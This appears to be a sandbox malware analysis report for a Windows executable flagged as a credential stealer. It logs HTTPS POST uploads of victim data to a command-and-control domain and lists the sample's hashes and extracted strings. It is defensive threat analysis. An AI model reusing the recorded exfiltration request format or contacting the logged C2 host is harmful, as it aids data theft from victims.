                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:56:37 UTC | 15023 | OUT | Data Ascii: --TYYEVX5PBContent-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--TYYEVX5PBContent-Disposition: form-data; name="pid"2--TYYEVX5PBContent-Disposition: form-data; name="lid"PsFKDg--pablo--TYYEVX5PBContent-Disp
2024-12-28 08:56:37 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:37 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=4esbtdrr4mla59iebvh3eo9jvk; expires=Wed, 23 Apr 2025 02:43:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dq2xScp0YP4cB5VysIbJska8FVlzOJpz994UEHK%2FvcU3%2FlgwwVBVk9QLEnhfP3Vym%2FmNVmnIVXACg3FfEAOp4ZERaNSOI8nnpBtJK94sjcp1Iz4ahSjcHaO9fGOUzlBtLPI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f9056913c31335a-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1796&rtt_var=683&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15953&delivery_rate=1592148&cwnd=232&unsent_bytes=0&cid=fafd0b94630e5963&ts=837&x=0"
2024-12-28 08:56:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:56:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | 5856 | C:\Users\user\Desktop\3LUyRfIoKs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:56:39 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=RLS0B21M9
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 20513
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:56:39 UTC | 15331 | OUT | Data Ascii: --RLS0B21M9Content-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--RLS0B21M9Content-Disposition: form-data; name="pid"3--RLS0B21M9Content-Disposition: form-data; name="lid"PsFKDg--pablo--RLS0B21M9Content-Disp
2024-12-28 08:56:40 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:40 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=k2nprtuvukf4hc1cbjc988m23r; expires=Wed, 23 Apr 2025 02:43:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5hZdizQ8FOEqbggLcWNp8gTfdrCy9MFOE9i1njc9x4a9hqJQIqy0URxqr%2FzHekyHQzcVaxRR2Q248399PyedgahexxBTKU99nBVKX%2Bi3KDRJEPy5NKlUVTQZCw8IQkohtOU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f90569ff95eefa7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1743&rtt_var=673&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21465&delivery_rate=1602634&cwnd=161&unsent_bytes=0&cid=e16228afaa8447c5&ts=1022&x=0"
2024-12-28 08:56:40 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:56:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | 5856 | C:\Users\user\Desktop\3LUyRfIoKs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:56:42 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=DXSZON86U9QPW6QDNT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1269
Host: lev-tolstoi.com
2024-12-28 08:56:42 UTC | 1269 | OUT | Data Raw: 2d 2d 44 58 53 5a 4f 4e 38 36 55 39 51 50 57 36 51 44 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 32 33 45 31 31 32 39 42 36 38 35 34 34 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 58 53 5a 4f 4e 38 36 55 39 51 50 57 36 51 44 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 58 53 5a 4f 4e 38 36 55 39 51 50 57 36 51 44 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
Data Ascii: --DXSZON86U9QPW6QDNTContent-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--DXSZON86U9QPW6QDNTContent-Disposition: form-data; name="pid"1--DXSZON86U9QPW6QDNTContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-28 08:56:43 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:56:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=tgv4lh1uetlf1nq64acp6488li; expires=Wed, 23 Apr 2025 02:43:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KhPmFndX7pP3rF2sf3fPycIx%2FhLiUZErvaCbNlTXXOE3SbXJjsG8tV1qPUqtHg2byQaAV8IOwprfGa78uO%2Ba%2BOs9KnB9MBnU3Ok2s%2BVDKypL1%2B596mOzbD%2FjrnVqsNGB6Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9056b31a6d43b5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2185&delivery_rate=1809169&cwnd=228&unsent_bytes=0&cid=bf4a5e6b04d963a6&ts=1163&x=0"
2024-12-28 08:56:43 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:56:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49731 | 104.21.66.86 | 443 | 5856 | C:\Users\user\Desktop\3LUyRfIoKs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:56:45 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=X7RLJH0RQFVBV0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 551089
Host: lev-tolstoi.com
2024-12-28 08:56:45 UTC | 15331 | OUT | Data Raw: 2d 2d 58 37 52 4c 4a 48 30 52 51 46 56 42 56 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 32 33 45 31 31 32 39 42 36 38 35 34 34 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 37 52 4c 4a 48 30 52 51 46 56 42 56 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 37 52 4c 4a 48 30 52 51 46 56 42 56 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 37 52 4c 4a 48 30 52
Data Ascii: --X7RLJH0RQFVBV0Content-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--X7RLJH0RQFVBV0Content-Disposition: form-data; name="pid"1--X7RLJH0RQFVBV0Content-Disposition: form-data; name="lid"PsFKDg--pablo--X7RLJH0R
2024-12-28 08:56:47 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:56:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ac5qdjff86n50mtmkiv440lu5s; expires=Wed, 23 Apr 2025 02:43:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5dzvBQC5ZCM8bu0WmoNM8tpmV3Mrt9eU7Nu0c4DhbgqpoV%2BoW7%2Fh%2FYs4uwpBNbxSDvv6fOTF6S%2FMED8FI9FcxdUk4z7RIKDNpdtE6cuiY14ruaeHFk477SrRPR1l81cWLc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f9056c50f0742d0-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1583&rtt_var=612&sent=196&recv=572&lost=0&retrans=0&sent_bytes=2836&recv_bytes=553565&delivery_rate=1762220&cwnd=207&unsent_bytes=0&cid=9a918cff7bf79569&ts=2754&x=0"



Target ID: 0
Start time: 03:56:20
Start date: 28/12/2024
Path: C:\Users\user\Desktop\3LUyRfIoKs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\3LUyRfIoKs.exe"
Imagebase: 0xaa0000
File size: 1'836'544 bytes
MD5 hash: E17BAAB743930B14A8D9A54086F091D6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                                                                                                                                                                                                                                                Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 74.3%
Total number of Nodes: 284
Total number of Limit Nodes: 29
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$lev-tolstoi.com$s$wdnf$~SS}$rp
                                                                                                                                                                                                                                                • API String ID: 0-796191818
                                                                                                                                                                                                                                                • Opcode ID: 1accadc007253980595cf19b768b9345a277f4b93f321b9e4abb705ff018cf04
                                                                                                                                                                                                                                                • Instruction ID: 3bfe4ed010054be00e261470796bfda8f25f27267d97995e6606850525936b9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1accadc007253980595cf19b768b9345a277f4b93f321b9e4abb705ff018cf04
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7B216B2A08341CFD714CF69C891BABBBE2FF95310F19896CE4959B391D7349902CB91
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                                • API String ID: 0-510280711
                                                                                                                                                                                                                                                • Opcode ID: d8493b425aa1b8611ebdd46469ee0fb0a86f5a658273ba6827f227e232fbed9c
                                                                                                                                                                                                                                                • Instruction ID: ed130ae38880d1a3f929f3e8cd6f17bbc31f00b1a9b9b01a2ad48de96194a908
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8493b425aa1b8611ebdd46469ee0fb0a86f5a658273ba6827f227e232fbed9c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36C206B1A083508FD724CF28D8917ABB7E5FF96314F19893CE4D98B292E7359901CB52

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                                • API String ID: 0-1565257739
                                                                                                                                                                                                                                                • Opcode ID: 8052a24dafabc51f7fc8a7f3f86308ebd708d54d13c7d5ea4afd0f673d5395fd
                                                                                                                                                                                                                                                • Instruction ID: 38657164fcceb609cde32a237b5d5c47d81274047e288204c7ce3ec715561fa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8052a24dafabc51f7fc8a7f3f86308ebd708d54d13c7d5ea4afd0f673d5395fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5922AD7150C7808FD324DB28C481B6FBBE1AB96314F1A492EE4DA8B392D779D845CB43

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00001F7A), ref: 00AD9551
                                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AD958F
                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 00AD98DF
                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AD98E5
                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 00AD992E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                                • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                                • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                                • Opcode ID: 41d86b3a76b8d4258dd2822e9d01348e9823dd0e7b22c2938e12559fb3fa1eec
                                                                                                                                                                                                                                                • Instruction ID: 71222953535de7db6d40b09e00e79b8b4f02147c327daa01337ce3f649eb350c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41d86b3a76b8d4258dd2822e9d01348e9823dd0e7b22c2938e12559fb3fa1eec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE223276A083419BD310CF28C880B5FBBE2EFC5714F18892DE9959B3A1D775D845CB82

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                                • API String ID: 0-620192811
                                                                                                                                                                                                                                                • Opcode ID: e575d4eb02ba4e7e01793bad6ad48515b2f4bb9a24785dc20eb76c5660b8ba03
                                                                                                                                                                                                                                                • Instruction ID: 8a26633eabb5df57d9969f88e19daf18e8a724222392a8a92b7bdceb4741e268
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e575d4eb02ba4e7e01793bad6ad48515b2f4bb9a24785dc20eb76c5660b8ba03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E20253B1610B41CFD724CF25E891B9BBBF1BB49314F048A2CD5AB8BAA1DB34A445CF50

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                                • API String ID: 0-4163809010
                                                                                                                                                                                                                                                • Opcode ID: b3514e9d49e8b5d826824c000c9203012aafe25fa6f0dead2d2fb6fe74676c45
                                                                                                                                                                                                                                                • Instruction ID: bf3133c7c1cb963ebdebccc878a5a54e8bd99a242d13d5a2f9fb424ebb45a8e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3514e9d49e8b5d826824c000c9203012aafe25fa6f0dead2d2fb6fe74676c45
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A52807260C7808FD3249B38C5A53EFBBE5AB96320F594A2ED4D9C73C2D67489458B43

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                                • API String ID: 0-1108506012
                                                                                                                                                                                                                                                • Opcode ID: f7836d44ed001f8fe6587c389981be554868c7b2fe035f5fa546d3cbe565801a
                                                                                                                                                                                                                                                • Instruction ID: 6fc1e2dc0d2207b0a3b56aa8ff52b3c5093d359b3943eb9e808e071c6e9144b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7836d44ed001f8fe6587c389981be554868c7b2fe035f5fa546d3cbe565801a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31B1087164C7818BD3148B68CC8436BBFD297D6324F1D4B2EE5EA473C2C6B9C8858746

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: +A#C=]=_$=]=_$_^]\$eN$rp
                                                                                                                                                                                                                                                • API String ID: 0-2225558837
                                                                                                                                                                                                                                                • Opcode ID: b5986f5cf4170d1f090b97dbedaba9a6347faa8a7225560b8aefb2657ffdbd10
                                                                                                                                                                                                                                                • Instruction ID: df41cb088bee0f105e236b0ba297a2fca790f1f72daa34d075f08f81490aa5df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5986f5cf4170d1f090b97dbedaba9a6347faa8a7225560b8aefb2657ffdbd10
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E34227B6A04201CFDB14CF68C891BAAB7B2FF89310F1A86ACD4459F395D734D942CB91

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                                                • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                                • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                                • Opcode ID: 6c4438b006d8e9dc09d3c6717df58a53703dcfe617533f38a8c56e0be19cb1ae
                                                                                                                                                                                                                                                • Instruction ID: 8a7ceff7f9fdc9465ad23236c5dae4c069eeef13f61b57cd700631bfe464f2dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c4438b006d8e9dc09d3c6717df58a53703dcfe617533f38a8c56e0be19cb1ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63A102B42047818FD716CF29C4D0666BBE2FF97314B18859CC4D24F7AAD736A846CB51

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00AA8A4A
                                                                                                                                                                                                                                                  • Part of subcall function 00AAB7B0: FreeLibrary.KERNEL32(00AA8A31), ref: 00AAB7B6
                                                                                                                                                                                                                                                  • Part of subcall function 00AAB7B0: FreeLibrary.KERNEL32 ref: 00AAB7D7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                                • String ID: b]u)$}$}
                                                                                                                                                                                                                                                • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                                • Opcode ID: 52f366490bfb280876f0dc235de97f0b039fccd1aa2a6f587b08331c926430e3
                                                                                                                                                                                                                                                • Instruction ID: 86013a5fd7edda54c6142d7dba0ca668d10fb3f05c31c6ca0ab89b6867408e80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52f366490bfb280876f0dc235de97f0b039fccd1aa2a6f587b08331c926430e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46C1F673E187144BC718DF69C84125AF7D6ABC8710F0EC52EA898EB395EA74DD058BC2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00ACD3EE
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                • String ID: ><+
                                                                                                                                                                                                                                                • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                                • Opcode ID: 5256b016b524df1da96410ea0bef449698c52475e1d8ab2ebcd0a1c626d9c2fc
                                                                                                                                                                                                                                                • Instruction ID: 85e6fb1af9cf376d0c35aafeb0da9a935954c652ae3964f1b08de0a977b08349
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5256b016b524df1da96410ea0bef449698c52475e1d8ab2ebcd0a1c626d9c2fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52C1C4756047818FD725CF2AC490762FBE2BF9A310F2985ADC4DA9B752C739E806CB50
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: @Ukx$
                                                                                                                                                                                                                                                • API String ID: 2994545307-3636270652
